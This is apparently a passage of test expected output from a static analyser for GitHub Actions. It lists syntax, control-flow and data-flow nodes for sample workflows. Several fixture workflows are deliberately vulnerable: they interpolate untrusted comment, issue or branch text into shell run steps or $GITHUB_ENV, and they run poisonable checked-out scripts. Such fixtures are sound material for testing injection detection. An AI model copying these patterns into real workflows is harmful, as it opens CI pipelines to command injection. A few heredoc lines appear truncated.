.github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | 
.github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/commands.yml:1:1:39:30 | enter on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push (normal) | +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| 
.github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| 
.github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| 
.github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:1:1:22:32 | enter on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push (normal) | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| 
.github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| 
.github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| 